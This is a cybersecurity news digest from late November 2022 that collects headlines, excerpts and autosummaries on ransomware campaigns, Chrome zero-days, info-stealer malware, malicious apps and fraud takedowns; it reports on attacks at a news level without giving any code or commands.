                Hackers are capitalizing on a trending TikTok challenge named "Invisible Challenge" to install malware on thousands of devices and steal their passwords, Discord accounts, and, potentially, cryptocurrency wallets. [...] "

                Autosummary: Checkmarx analysts discovered that the attackers used multiple Python packages hosted on PyPI, including "tiktok-filter-api", "pyshftuler", "pyiopcs," and "pydesings," with new ones added every time the old packages are reported and removed. "


                Acer fixes UEFI bugs that can be used to disable Secure Boot

                exploits
                2022-11-28 https://www.bleepingcomputer.com/news/security/acer-fixes-uefi-bugs-that-can-be-used-to-disable-secure-boot/
                Acer has fixed a high-severity vulnerability affecting multiple laptop models that could enable local attackers to deactivate UEFI Secure Boot security feature. [...] "

                Autosummary: "


                RansomBoggs: New ransomware targeting Ukraine

                exploits ransomware
                2022-11-28 https://www.welivesecurity.com/2022/11/28/ransomboggs-new-ransomware-ukraine/

                ESET researchers spot a new ransomware campaign that goes after Ukrainian organizations and has Sandworm's fingerprints all over it

                The post RansomBoggs: New ransomware targeting Ukraine appeared first on WeLiveSecurity

                "

                Autosummary: In the ransom note (SullivanDecryptsYourFiles.txt), the authors of RansomBoggs make multiple references to the Monsters Inc. movie, including by impersonating James P. Sullivan, the movie’s main protagonist. "


                Russia-based RansomBoggs Ransomware Targeted Several Ukrainian Organizations

                exploits ransomware
                2022-11-26 https://thehackernews.com/2022/11/russia-based-ransomboggs-ransomware.html
                Ukraine has come under a fresh onslaught of ransomware attacks that mirror previous intrusions attributed to the Russia-based Sandworm nation-state group. Slovak cybersecurity company ESET, which dubbed the new ransomware strain RansomBoggs, said the attacks against several Ukrainian entities were first detected on November 21, 2022. "While the malware written in .NET is new, its deployment is "

                Autosummary: "


                Ransomware gang targets Belgian municipality, hits police instead

                exploits
                2022-11-26 https://www.bleepingcomputer.com/news/security/ransomware-gang-targets-belgian-municipality-hits-police-instead/
                The Ragnar Locker ransomware gang has published stolen data from what they thought was the municipality of Zwijndrecht, but turned out to be stolen from Zwijndrecht police, a local police unit in Antwerp, Belgium. [...] "

                Autosummary: Belgian lawyer and privacy activist Matthias Dobbelaere-Welvaert told BleepingComputer that exposed individuals should change everything they can, including license plates, identity cards, passports, etc. "You can't easily change where you live, but even if you change all documents, the repercussions of this security incident could be for a lifetime, and theft identity is no joke," says Dobbelaere-Welvaert. "


                Check Point launches CyberUp program to support Israel’s growing network of cybersecurity start-ups

                ciber
                2022-11-25 https://www.helpnetsecurity.com/2022/11/25/check-point-cyberup/

                Check Point has launched its CyberUp program, an initiative that will support Israel’s growing network of cybersecurity start-ups by opening up market opportunities with its customers and providing access to potential investors. As well as guiding successful participants through the crucial stages of growth, CyberUp will in turn give Check Point customers access to Israeli innovation. Unlike other start-up programs, CyberUp is focused solely on the cybersecurity sector. Candidates are carefully selected, vetted, and chosen … More

                The post Check Point launches CyberUp program to support Israel’s growing network of cybersecurity start-ups appeared first on Help Net Security.

                "

                Autosummary: These are Cyberpion, Grip Security, Infinipoint, Reflectiz, Sentra, Suridata and Zero Networks. "


                5 cybersecurity predictions for 2023

                ciber
                2022-11-25 https://www.helpnetsecurity.com/2022/11/25/top-cybersecurity-predictions-2023/

                The cyber game is now an entire underground economy wrapped around cyberattacks. Thanks to increased international friction and the activity of groups such as Lapsus$, cybercriminals have upped the ante on cybercrime in order to turn a profit. Atakama outlines its top cybersecurity predictions for 2023. IoT blends with shadow IT to make a security headache With 43 billion devices connected to the internet in 2023, attackers have no shortage of targets. Although IoT devices … More

                The post 5 cybersecurity predictions for 2023 appeared first on Help Net Security.

                "

                Autosummary: In response, organizations will need to look beyond conventional data protection practices toward technologies that protect data at the source, such as multifactor encryption to render files useless to threat actors who will not be able to access the data, whether it is still inside the security perimeter or successfully exfiltrated. Double extortion attacks pack an even greater punch: they encrypt sensitive and proprietary data, hold it for ransom, and, worse, publish the data on the dark web unless organizations cough up the cash. "


                Google pushes emergency Chrome update to fix 8th zero-day in 2022

                exploits
                2022-11-25 https://www.bleepingcomputer.com/news/security/google-pushes-emergency-chrome-update-to-fix-8th-zero-day-in-2022/
                Google has released an emergency security update for the desktop version of the Chrome web browser, addressing the eighth zero-day vulnerability exploited in attacks this year. [...] "

                Autosummary: Chrome version 107.0.5304.121/122 fixes the eighth actively exploited zero-day vulnerability this year, indicating the high interest of attackers in the widely used browser. "


                Overcoming unique cybersecurity challenges in schools

                ciber
                2022-11-25 https://www.helpnetsecurity.com/2022/11/25/ransomware-attacks-schools/

                A school’s ecosystem is far different from that of the typical enterprise. Not only does a school district face the monumental task of educating our upcoming generations, but they must do it at the scale of a Fortune 500 enterprise with a fraction of the budget! With ransomware attacks rising, administrators must find ways to prevent their schools from becoming the next victim, while preserving the integrity of the learning process. Furthermore, unlike companies who … More

                The post Overcoming unique cybersecurity challenges in schools appeared first on Help Net Security.

                "

                Autosummary: Unfortunately, students and staff often make themselves vulnerable through the re-use of passwords across dozens of platforms, devices, websites, and applications within the school. Remote learning, cloud-based tools, smartphones, laptops, and countless other devices have wiped away any perimeter for schools and the sensitive information that they house. "


                Interpol Seized $130 Million from Cybercriminals in Global "HAECHI-III" Crackdown Operation

                ciber
                2022-11-25 https://thehackernews.com/2022/11/interpol-seized-130-million-from.html
                Interpol on Thursday announced the seizure of $130 million worth of virtual assets in connection with a global crackdown on cyber-enabled financial crimes and money laundering. The international police operation, dubbed HAECHI-III, transpired between June 28 and November 23, 2022, resulting in the arrests of 975 individuals and the closure of more than 1,600 cases. This comprised two fugitives "

                Autosummary: "


                UK urges to disconnect Chinese security cameras in government buildings

                government
                2022-11-25 https://securityaffairs.co/wordpress/138945/digital-id/uk-ban-chinese-security-cameras.html

                The British government banned the installation of Chinese-linked security cameras at sensitive facilities due to security risks. Reuters reports that the British government ordered its departments to stop installing Chinese security cameras at sensitive buildings due to security risks. The Government has ordered departments to disconnect the cameras from core networks and to consider removing […]

                The post UK urges to disconnect Chinese security cameras in government buildings appeared first on Security Affairs.

                "

                Autosummary: "


                Update Chrome Browser Now to Patch New Actively Exploited Zero-Day Flaw

                exploits
                2022-11-25 https://thehackernews.com/2022/11/update-chrome-browser-now-to-patch-new.html
                Google on Thursday released software updates to address yet another zero-day flaw in its Chrome web browser. Tracked as CVE-2022-4135, the high-severity vulnerability has been described as a heap buffer overflow in the GPU component. Clement Lecigne of Google's Threat Analysis Group (TAG) has been credited with reporting the flaw on November 22, 2022. Heap-based buffer overflow bugs can be "

                Autosummary: "


                Google fixed the eighth actively exploited #Chrome #zeroday this year

                exploits
                2022-11-25 https://securityaffairs.co/wordpress/138977/hacking/8-google-chrome-zero-day.html

                Google on Thursday released security updates to address a new zero-day vulnerability, tracked as CVE-2022-4135, impacting the Chrome web browser. Google rolled out an emergency security update for the desktop version of the Chrome web browser to address a new zero-day vulnerability, tracked as CVE-2022-4135, that is actively exploited. The CVE-2022-4135 vulnerability is a heap […]

                The post Google fixed the eighth actively exploited #Chrome #zeroday this year appeared first on Security Affairs.

                "

                Autosummary: CVE-2022-2856 (August 17) – insufficient validation of untrusted input in Intents; CVE-2022-2294 (July 4) – heap buffer overflow in the Web Real-Time Communications (WebRTC) component; CVE-2022-1364 (April 14) – type confusion issue in the V8 JavaScript engine; CVE-2022-1096 (March 25) – type confusion in the V8 JavaScript engine; CVE-2022-0609 (February 14) – use-after-free issue in the Animation component. "


                New ransomware attacks in Ukraine linked to Russian Sandworm hackers

                exploits ransomware
                2022-11-25 https://www.bleepingcomputer.com/news/security/new-ransomware-attacks-in-ukraine-linked-to-russian-sandworm-hackers/
                New ransomware attacks targeting organizations in Ukraine first detected this Monday have been linked to the notorious Russian military threat group known as Sandworm. [...] "

                Autosummary: Once pushed across a victim's network, RansomBoggs encrypts files using AES-256 in CBC mode with a random key (randomly generated, RSA encrypted, and written to aes.bin), and it appends a .chsch extension to all encrypted files. "


                Vice Society ransomware claims attack on Cincinnati State college

                exploits government ransomware
                2022-11-25 https://www.bleepingcomputer.com/news/security/vice-society-ransomware-claims-attack-on-cincinnati-state-college/
                The Vice Society ransomware operation has claimed responsibility for a cyberattack on Cincinnati State Technical and Community College, with the threat actors now leaking data allegedly stolen during the attack. [...] "

                Autosummary: However, voicemail, network printing, VPN access, network and intranet shared drives are all unavailable, while a range of online application and registration portals are also offline. "


                How cloud PCs act as an insurance plan for ransomware recovery

                exploits ransomware
                2022-11-24 https://www.helpnetsecurity.com/2022/11/24/cloud-pcs-business-recovery-video/

                Although companies are spending billions on preventative security measures, attacks are a common occurrence. Business continuity requires enterprises to go beyond prevention and prioritize a strategic recovery plan. In this Help Net Security video, Matt Davidson, CTO at Workspot, discusses how cloud PCs are serving as a modern insurance plan for business recovery, enabling safe access for employees from anywhere in the world at a moment’s notice while IT leaders investigate and mitigate the damage.

                The post How cloud PCs act as an insurance plan for ransomware recovery appeared first on Help Net Security.

                "

                Autosummary: "


                This Android File Manager App Infected Thousands of Devices with Sharkbot Malware

                exploits
                2022-11-24 https://thehackernews.com/2022/11/this-android-file-manager-app-infected.html
                The Android banking fraud malware known as SharkBot has reared its head once again on the official Google Play Store, posing as file managers to bypass the app marketplace's restrictions. A majority of the users who downloaded the rogue apps are located in the U.K. and Italy, Romanian cybersecurity company Bitdefender said in an analysis published this week. SharkBot, first discovered towards "

                Autosummary: The dropper apps, now taken down, are below - X-File Manager (com.victorsoftice.llc) - 10,000+ downloads FileVoyager (com.potsepko9.FileManagerApp) - 5,000+ downloads LiteCleaner M (com.ltdevelopergroups.litecleaner.m) - 1,000+ downloads LiteCleaner M is still available for download from a third-party app store called Apksos, which also houses a fourth SharkBot artifact by the name "Phone AID, Cleaner, Booster" (com.sidalistudio.developer.app). "


                Black Basta Ransomware Gang Actively Infiltrating U.S. Companies with Qakbot Malware

                exploits ransomware
                2022-11-24 https://thehackernews.com/2022/11/black-basta-ransomware-gang-actively.html
                Companies based in the U.S. have been at the receiving end of an "aggressive" Qakbot malware campaign that leads to Black Basta ransomware infections on compromised networks. "In this latest campaign, the Black Basta ransomware gang is using QakBot malware to create an initial point of entry and move laterally within an organization's network," Cybereason researchers Joakim Kandefelt and "

                Autosummary: "


                An aggressive malware campaign targets US-based companies with Qakbot to deliver Black Basta Ransomware

                exploits ransomware
                2022-11-24 https://securityaffairs.co/wordpress/138924/cyber-crime/qakbot-campaign-black-basta-ransomware.html

                Researchers warn of an ongoing aggressive Qakbot malware campaign that leads to Black Basta ransomware infections in the US. Experts at the Cybereason Global SOC (GSOC) team have observed a surge in Qakbot infections as part of an ongoing aggressive Qakbot malware campaign that leads to Black Basta ransomware infections in the US. In the last two […]

                The post An aggressive malware campaign targets US-based companies with Qakbot to deliver Black Basta Ransomware appeared first on Security Affairs.

                "

                Autosummary: QakBot, also known as QBot or Pinkslipbot, is a banking trojan primarily used to steal victims’ financial data, including browser information, keystrokes, and credentials. "


                Threat actors exploit discontinued Boa web servers to target critical infrastructure

                exploits
                2022-11-24 https://securityaffairs.co/wordpress/138916/hacking/boa-web-servers-attacks.html

                Microsoft reported that hackers have exploited flaws in a now-discontinued web server called Boa in attacks against critical industries. Microsoft experts believe that threat actors behind a malicious campaign aimed at Indian critical infrastructure earlier this year have exploited security flaws in a now-discontinued web server called Boa. The Boa web server is widely used across a […]

                The post Threat actors exploit discontinued Boa web servers to target critical infrastructure appeared first on Security Affairs.

                "

                Autosummary: Investigating the headers further indicated that over 10% of all active IP addresses returning the headers were related to critical industries, such as the petroleum industry and associated fleet services, with many of the IP addresses associated to IoT devices, such as routers, with unpatched critical vulnerabilities, highlighting an accessible attack vector for malware operators. "


                U.S. govt seizes domains used in "pig butchering" scams

                financial
                2022-11-24 https://www.bleepingcomputer.com/news/security/us-govt-seizes-domains-used-in-pig-butchering-scams/
                For the first time, the U.S. Department of Justice seized seven domains that hosted websites linked to "pig butchering" scams, where fraudsters trick victims of romance scams into investing in cryptocurrency via fake investment platforms. [...] "

                Autosummary: When the victim tried to withdraw some of the fake profits, totaling over $7 million per the fake in-app alerts, the scammers asked for additional payments of "taxes," "fees," and "security deposits" to prove they were "not involved in any illegal behavior." "


                New RansomExx Ransomware Variant Rewritten in the Rust Programming Language

                exploits ransomware
                2022-11-24 https://thehackernews.com/2022/11/new-ransomexx-ransomware-variant.html
                The operators of the RansomExx ransomware have become the latest to develop a new variant fully rewritten in the Rust programming language, following other strains like BlackCat, Hive, and Luna. The latest version, dubbed RansomExx2 by the threat actor known as Hive0091 (aka DefrayX), is primarily designed to run on the Linux operating system, although it's expected that a Windows version will "

                Autosummary: "


                Boost Your Security with Europe's Leading Bug Bounty Platform

                exploits
                2022-11-24 https://thehackernews.com/2022/11/boost-your-security-with-europes.html
                As 2022 comes to an end, now's the time to level up your bug bounty program with Intigriti. Are you experiencing slow bug bounty lead times, gaps in security skills, or low-quality reports from researchers? Intigriti's expert triage team and global community of ethical hackers are enabling businesses to protect themselves against every emerging cybersecurity threat. Join the likes of Intel, "

                Autosummary: Join the likes of Intel, Yahoo, and Sixt who levelled up their security with Intigriti to enjoy higher quality bug bounty reports, faster lead times, and an intuitive platform. "


                Interpol seized $130 million from cybercriminals worldwide

                ciber
                2022-11-24 https://www.bleepingcomputer.com/news/security/interpol-seized-130-million-from-cybercriminals-worldwide/
                INTERPOL has announced the seizure of $130,000,000 million worth of money and virtual assets linked to various cybercrimes and money laundering operations. [...] "

                Autosummary: The types of cybercrimes that generated the said amount include romance scams, voice phishing, sextortion, investment fraud, and money laundering associated with illegal online gambling. "


                Operation Elaborate – UK police text 70,000 people thought to have fallen victim to iSpoof bank fraudsters

                financial
                2022-11-24 https://www.tripwire.com/state-of-security/operation-elaborate-uk-police-text-70000-suspected-victims-ispoof-bank-fraudsters
                UK police are texting 70,000 people who they believe have fallen victim to a worldwide scam that saw fraudsters steal at least £50 million from bank accounts. Read more in my article on the Tripwire State of Security blog. "

                Autosummary: Scammers paid a subscription to a service called iSpoof.cc that allowed them to disguise their phone number so they appeared to be calling from major banks including Barclays, NatWest, HSBC, Santander, Lloyds, First Direct, Nationwide, Halifax, and TSB. "


                RansomExx Ransomware upgrades to Rust programming language

                exploits ransomware
                2022-11-24 https://securityaffairs.co/wordpress/138933/malware/ransomexx-ransomware-rust-language.html

                RansomExx is the latest ransomware to get a version written entirely in the Rust programming language. The operators of the RansomExx ransomware (aka Defray777 and Ransom X) have developed a new variant of their malware, tracked as RansomExx2, that was ported to the Rust programming language. The move follows the […]

                The post RansomExx Ransomware upgrades to Rust programming language appeared first on Security Affairs.

                "

                Autosummary: The move follows the decision of other ransomware gangs, like Hive, Blackcat, and Luna, of rewriting their ransomware into Rust programming language. "


                10 tips to avoid Black Friday and Cyber Monday scams

                financial
                2022-11-24 https://www.welivesecurity.com/2022/11/24/10-tips-avoid-black-friday-cyber-monday-scams/

                It pays not to let your guard down during the shopping bonanza – watch out for some of the most common scams doing the rounds this holiday shopping season

                The post 10 tips to avoid Black Friday and Cyber Monday scams appeared first on WeLiveSecurity

                "

                Autosummary: So, you needn’t be paranoid, but definitely be wary of too-good-to-be-true offers, and be aware that the more technology we use and the more our reliance on all things online grows, the more likely we may be to fall victim. Also, do not make payments by bank transfer, but request to use other payment methods, such as PayPal, that offer reimbursements to buyers who don’t get what they paid for. The trouble is, clicking the link in the email or text so that you can supposedly claim your gift card will install malware, cause you to lose your personal data, or you end up with a stolen card. "


                For two years security experts kept secret that they were helping Zeppelin ransomware victims decrypt their files

                exploits ransomware
                2022-11-23 https://grahamcluley.com/for-two-years-security-experts-kept-secret-that-they-were-helping-zeppelin-ransomware-victims-decrypt-their-files/
                Researchers at cybersecurity firm Unit 221B have revealed that they have been secretly helping victims of the Zeppelin ransomware decrypt their computer systems since 2020. "

                Autosummary: We have also dumped all of your documents relating to accounting, administration, legal, HR, NDA, SQL, passwords and more! "


                Sonrai Risk Insights Engine empowers security teams to reduce impact of exploits

                exploits
                2022-11-23 https://www.helpnetsecurity.com/2022/11/23/sonrai-risk-insights-engine/

                Sonrai Security releases Risk Insights Engine which lets developer and security teams control the chaos in both their organizations and their multicloud environments, minimizing lateral movement that leads to data theft. Having already given customers comprehensive visibility into and control over every identity and the data each has access to in their multicloud environments, Sonrai now lets teams apply platform-recommended remediations to existing lateral movement risks, benchmark their performance against self-defined goals and similar organizations, … More

                The post Sonrai Risk Insights Engine empowers security teams to reduce impact of exploits appeared first on Help Net Security.

                "

                Autosummary: The platform recommends goals based on multiple factors, including the intended use of an environment (development, staging, production, etc.), presence of sensitive data (e.g., PII), and the maturity of the team responsible for it. "


                Malwarebytes collaborates with Stellar Cyber to increase productivity and efficiency of security teams

                exploits
                2022-11-23 https://www.helpnetsecurity.com/2022/11/23/malwarebytes-stellar-cyber/

                Malwarebytes partners with Stellar Cyber to help resource-constrained teams produce consistent security outcomes across all environments: on-premises, cloud and anything in between. The partnership comes at a critical time in the cybersecurity landscape, as security products become more complex and IT teams spend more time maintaining their security controls, instead of investigating and mitigating cyber threats. According to a 2020 report from Palo Alto Networks, only 46 percent of security operations decision makers are satisfied … More

                The post Malwarebytes collaborates with Stellar Cyber to increase productivity and efficiency of security teams appeared first on Help Net Security.

                "

                Autosummary: "


                OneTrust partners with ECI to help companies evaluate their ethics and compliance programs

                industry
                2022-11-23 https://www.helpnetsecurity.com/2022/11/23/onetrust-eci/

                OneTrust is partnering with the Ethics & Compliance Initiative (ECI), the global non-profit organization that empowers organizations to build and sustain cultures of integrity. The partnership enables OneTrust to offer its customers the ECI High-Quality Ethics & Compliance Program (HQP) Assessment tool, which helps organizations evaluate their ethics and compliance programs and determine their level of maturity. ECI has led the effort for organizations to identify and adopt high-quality ethics and compliance programs for many … More

                The post OneTrust partners with ECI to help companies evaluate their ethics and compliance programs appeared first on Help Net Security.

                "

                Autosummary: The OneTrust Ethics and Compliance Cloud brings together ethics program management, speak-up culture assurance, and third-party due diligence to unify people, processes, and technology across ethics, compliance, HR, and legal teams. "


                Nighthawk Likely to Become Hackers' New Post-Exploitation Tool After Cobalt Strike

                exploits
                2022-11-23 https://thehackernews.com/2022/11/nighthawk-likely-to-become-hackers-new.html
                A nascent and legitimate penetration testing framework known as Nighthawk is likely to gain threat actors' attention for its Cobalt Strike-like capabilities. Enterprise security firm Proofpoint said it detected the use of the software in mid-September 2022 with a number of test emails sent using generic subject lines such as "Just checking in" and "Hope this works2." However, there are no


                Russian cybergangs stole over 50 million passwords this year

                ciber
                2022-11-23 https://www.bleepingcomputer.com/news/security/russian-cybergangs-stole-over-50-million-passwords-this-year/
                At least 34 distinct Russian-speaking cybercrime groups using info-stealing malware like Raccoon and Redline have collectively stolen 50,350,000 account passwords from over 896,000 individual infections from January to July 2022. [...]

                Autosummary: Passwords stolen: 50,352,518 (up by 80%); cookie files exfiltrated: 2,117,626,523 (up by 74%); crypto wallets breached: 113,204 (up by 216%); payment cards compromised: 103,150 (up by 81%). [Figure: Infostealer operation stats from first seven months of 2022 (Group-IB)] Group-IB also notes that in the first seven months of this year the actors focused on stealing Steam, Epic Games, and Roblox accounts, recording a five-fold increase compared to last year.


                Hackers Exploiting Abandoned Boa Web Servers to Target Critical Industries

                exploits
                2022-11-23 https://thehackernews.com/2022/11/hackers-exploiting-abandoned-boa-web.html
                Microsoft on Tuesday disclosed the intrusion activity aimed at Indian power grid entities earlier this year likely involved the exploitation of security flaws in a now-discontinued web server called Boa. The tech behemoth's cybersecurity division said the vulnerable component poses a "supply chain risk that may affect millions of organizations and devices." The findings build on a prior report

                Autosummary: Some of the high-severity bugs affecting Boa include CVE-2017-9833 and CVE-2021-33558, which, if successfully exploited, could enable malicious hacking groups to read arbitrary files, obtain sensitive information, and achieve remote code execution.


                A flaw in ConnectWise Control spurred the company to make life harder for scammers

                financial
                2022-11-23 https://www.helpnetsecurity.com/2022/11/23/connectwise-control-vulnerability-scammers/

                A vulnerability in popular remote access service/platform ConnectWise Control could have been leveraged by scammers to make compromising targets’ computers easier, Guardio researchers have discovered. By abusing the fully-featured 14-day trial option for that hosted cloud service, scammers are already taking advantage of the platform at no cost, but the vulnerability could have allowed them to remove an alert that can break the illusion the scammers are trying to create. What is ConnectWise Control? ConnectWise … More

                The post A flaw in ConnectWise Control spurred the company to make life harder for scammers appeared first on Help Net Security.

                "

                Autosummary: “For a scammer, all left is to call the victims and manipulate them as if they have some computer technical issue, or alternatively as in our example — send them a fake invoice for some service they never registered to and wait for them to go to the fake refund service portal and enter the ‘invoice’ code (triggering the dedicated RAT installation),” the researchers explained. "


                34 Russian Cybercrime Groups Stole Over 50 Million Passwords with Stealer Malware

                exploits
                2022-11-23 https://thehackernews.com/2022/11/34-russian-hacker-groups-stole-over-50.html
                As many as 34 Russian-speaking gangs distributing information-stealing malware under the stealer-as-a-service model stole no fewer than 50 million passwords in the first seven months of 2022. "The underground market value of stolen logs and compromised card details is estimated around $5.8 million," Singapore-headquartered Group-IB said in a report shared with The Hacker News. Aside from looting

                Autosummary: A majority of the victims are located in the U.S., followed by Brazil, India, Germany, Indonesia, the Philippines, France, Turkey, Vietnam, and Italy.


                Ducktail Malware Operation Evolves with New Malicious Capabilities

                exploits
                2022-11-23 https://thehackernews.com/2022/11/ducktail-malware-operation-evolves-with.html
                The operators of the Ducktail information stealer have demonstrated a "relentless willingness to persist" and continued to update their malware as part of an ongoing financially driven campaign. "The malware is designed to steal browser cookies and take advantage of authenticated Facebook sessions to steal information from the victim's Facebook account," WithSecure researcher Mohammad Kazem

                Autosummary: The latest iteration of the malware, which resurfaced on September 6, 2022, after the threat actor was forced to halt its operations on August 12 in response to public disclosure, comes with a host of improvements incorporated to circumvent detection.


                Experts claim that iPhone’s analytics data is not anonymous

                industry
                2022-11-23 https://securityaffairs.co/wordpress/138884/digital-id/iphone-found-collecting-personal-data.html

                Researchers discovered that analytics data associated with iPhone include Directory Services Identifier (DSID) that could allow identifying users. Researchers at software company Mysk discovered that analytics data collected by iPhone include the Directory Services Identifier (DSID), which could allow identifying users. Apple collects both DSID and Apple ID, which means that it can use the […]

                The post Experts claim that iPhone’s analytics data is not anonymous appeared first on Security Affairs.

                "

                Autosummary: Linkedin Whatsapp Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "


                Hive ransomware has extorted $100 million in 18 months, FBI warns

                exploits ransomware
                2022-11-23 https://www.bitdefender.com/blog/hotforsecurity/hive-ransomware-has-extorted-100-million-in-18-months-fbi-warns/
                $100 million. That's the amount of money that the Hive ransomware is thought to have extorted from over 1300 companies around the world, according to a joint report from the FBI, CISA, and HHS. Read more in my article on the Hot for Security blog.

                Autosummary: First seen in mid 2021, Hive is a ransomware-as-a-service (RaaS) operation, which different cybercriminals have used in attacks launched against healthcare institutions, non-profit organisations, energy providers, and retailers, amongst other sectors.


                Ducktail information stealer continues to evolve

                ransomware
                2022-11-23 https://securityaffairs.co/wordpress/138894/cyber-crime/ducktail-information-stealer-evolution.html

                The operators behind the Ducktail information stealer continue to improve their malicious code, experts warn. In late July 2022, researchers from WithSecure (formerly F-Secure Business) discovered an ongoing operation, named DUCKTAIL, that was targeting individuals and organizations that operate on Facebook’s Business and Ads platform. Experts attribute the campaign to a Vietnamese financially motivated […]

                The post Ducktail information stealer continues to evolve appeared first on Security Affairs.

                "

                Autosummary: Linkedin Whatsapp Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "


                Get 50% off Emsisoft Anti-Malware Home through Cyber Monday

                exploits
                2022-11-23 https://www.bleepingcomputer.com/news/security/get-50-percent-off-emsisoft-anti-malware-home-through-cyber-monday/
                Emsisoft"s Black Friday through Cyber Monday deal is now live with 50% off Emsisoft Anti-Malware Home 1-year licenses for 1, 3, or 5 devices. [...] "

                Autosummary: Emsisoft Anti-Malware Home detecting malware on a test machine Source: BleepingComputer Some of the features included in Emsisoft Anti-Malware are: A cloud-based dashboard to manage all of your devices; Emsisoft (A) & Bitdefender (B) Fast Scanning dual-engine scanner scans faster than others that use only one. "


                ReasonLabs joins Anti-Malware Testing Standards Organization to strengthen anti-malware solutions

                exploits
                2022-11-22 https://www.helpnetsecurity.com/2022/11/22/reasonlabs-amtso/

                ReasonLabs has joined the Anti-Malware Testing Standards Organization (AMTSO), an international non-profit association that focuses on addressing the global need for improvement in the objectivity, quality and relevance of anti-malware testing methodologies. AMTSO is a member-driven organization that develops standards and guidelines for anti-malware testing, providing advice and guidance to the expert testers that make up its member organizations, as well as to others starting out in testing. The organization developed and maintains a Testing … More

                The post ReasonLabs joins Anti-Malware Testing Standards Organization to strengthen anti-malware solutions appeared first on Help Net Security.

                "

                Autosummary: "


                How entrepreneurs can capitalize on the impending golden age of cybersecurity

                ciber
                2022-11-22 https://www.helpnetsecurity.com/2022/11/22/cybersecurity-investing-golden-age/

                As the markets continue to fluctuate, budget cuts and layoffs now extend across the tech industry, with cybersecurity no exception from tightening its belt and assessing its priorities. Investors are proceeding with caution and waiting to see a correction in valuations, while cybersecurity startups are examining their runway and long-term viability. The growing number and sophistication of cyberattacks, however, reinforce the need for heightened security awareness and innovation. Standing on the front lines of these … More

                The post How entrepreneurs can capitalize on the impending golden age of cybersecurity appeared first on Help Net Security.

                "

                Autosummary: Udi Mokady, chairman and CEO of CyberArk, who amassed decades of experience working with cybersecurity professionals, says, “Never go frothy in good times, and never over-correct in bad times.As they grow, they must pay more attention to the correlation between growth rate and burn rate, unit economics in terms of customer acquisition and all the important basics — product-market fit, sales repeatability and more, before they begin to scale.” Greg Sands, managing director at Costanoa Ventures, agrees: “Those of us who help startups build brick-by-brick and grow at a good pace into stellar companies with great unit economics are not worried, and will not change our investing approach.” The mix of bountiful opportunities and a limited number of top-of-the-line vendors in the early 2000s brought about the “bronze age” of cybersecurity, as Richard called it, with the “silver age” dawning in the post-2008 crisis as cloud computing began its meteoric rise and helped establish the tech behemoths that are today iconic and publicly owned. "


                Luna Moth Gang Invests in Call Centers to Target Businesses with Callback Phishing Campaigns

                financial
                2022-11-22 https://thehackernews.com/2022/11/luna-moth-gang-invests-in-call-centers.html
                The Luna Moth campaign has extorted hundreds of thousands of dollars from several victims in the legal and retail sectors. The attacks are notable for employing a technique called callback phishing or telephone-oriented attack delivery (TOAD), wherein the victims are social engineered into making a phone call through phishing emails containing invoices and subscription-themed lures. Palo Alto

                Autosummary: To give these attacks a veneer of legitimacy, the adversaries, instead of dropping a malware like BazarLoader, take advantage of legitimate tools like Zoho Assist to remotely interact with a victim's computer, abusing the access to deploy other trusted software such as Rclone or WinSCP for harvesting data.


                U.S. Authorities Seize Domains Used in "Pig butchering" Cryptocurrency Scams

                financial
                2022-11-22 https://thehackernews.com/2022/11/us-authorities-seize-domains-used-in.html
                The U.S. Justice Department (DoJ) on Monday announced the takedown of seven domain names in connection to a "pig butchering" cryptocurrency scam. The fraudulent scheme, which operated from May to August 2022, netted the actors over $10 million from five victims, the DoJ said. Pig butchering, also called Sha Zhu Pan, is a type of scam in which swindlers lure unsuspecting investors into sending

                Autosummary: "In addition to cryptocurrency-based lures, these criminal enterprises have used gold, forex, stocks, and other subjects to exploit their victims," researchers Tim Kromphardt and Genina Po said.


                Researchers Warn of Cyber Criminals Using Go-based Aurora Stealer Malware

                exploits
                2022-11-22 https://thehackernews.com/2022/11/researchers-warn-of-cyber-criminals.html
                A nascent Go-based malware known as Aurora Stealer is being increasingly deployed as part of campaigns designed to steal sensitive information from compromised hosts. "These infection chains leveraged phishing pages impersonating download pages of legitimate software, including cryptocurrency wallets or remote access tools, and the 911 method making use of YouTube videos and SEO-poised fake


                Aurora Stealer Malware is becoming a prominent threat in the cybercrime ecosystem

                exploits
                2022-11-22 https://securityaffairs.co/wordpress/138851/malware/aurora-stealer-malware.html

                Researchers warn of threat actors employing a new Go-based malware dubbed Aurora Stealer in attacks in the wild. Aurora Stealer is an info-stealing malware that was first advertised on Russian-speaking underground forums in April 2022. Aurora was offered as Malware-as-a-Service (MaaS) by a threat actor known as Cheshire. It is a multi-purpose botnet with data stealing […]

                The post Aurora Stealer Malware is becoming a prominent threat in the cybercrime ecosystem appeared first on Security Affairs.

                "

                Autosummary: “These infection chains leveraged phishing pages impersonating download pages of legitimate software, including cryptocurrency wallets or remote access tools, and the 911 method making use of YouTube videos and SEO-poised fake cracked software download websites.” reads the analysis by the experts. "


                Android file manager apps infect thousands with Sharkbot malware

                exploits
                2022-11-22 https://www.bleepingcomputer.com/news/security/android-file-manager-apps-infect-thousands-with-sharkbot-malware/
                A new collection of malicious Android apps posing as harmless file managers had infiltrated the official Google Play app store, infecting users with the Sharkbot banking trojan. [...]

                Autosummary: The malicious app requests the user to grant risky permissions like reading and writing external storage, installing new packages, accessing account details, deleting packages (to wipe traces), etc.


                Ouch! Ransomware gang says it won’t attack AirAsia again due to the “chaotic organisation” and sloppy security of hacked company’s network

                exploits ransomware
                2022-11-22 https://grahamcluley.com/ouch-ransomware-gang-says-it-wont-attack-airasia-again-due-to-the-chaotic-organisation-and-sloppy-security-of-hacked-companys-network/
                The Daixin ransomware gang has given a humiliating slap in the face to Air Asia, which lost the personal data of five million passengers and all of its employees earlier this month.


                This Malware Installs Malicious Browser Extensions to Steal Users' Passwords and Cryptos

                exploits
                2022-11-22 https://thehackernews.com/2022/11/this-malware-installs-malicious-browser.html
                A malicious extension for Chromium-based web browsers has been observed to be distributed via a long-standing Windows information stealer called ViperSoftX. Czech-based cybersecurity company dubbed the rogue browser add-on VenomSoftX owing to its standalone features that enable it to access website visits, steal credentials and clipboard data, and even swap cryptocurrency addresses via an

                Autosummary: Avast said it has detected and blocked over 93,000 infections since the start of 2022, with a majority of the impacted users located in India, the U.S., Italy, Brazil, the U.K., Canada, France, Pakistan, and South Africa.


                Donut extortion group also targets victims with ransomware

                exploits ransomware
                2022-11-22 https://www.bleepingcomputer.com/news/security/donut-extortion-group-also-targets-victims-with-ransomware/
                The Donut (D0nut) extortion group has been confirmed to deploy ransomware in double-extortion attacks on the enterprise. [...]

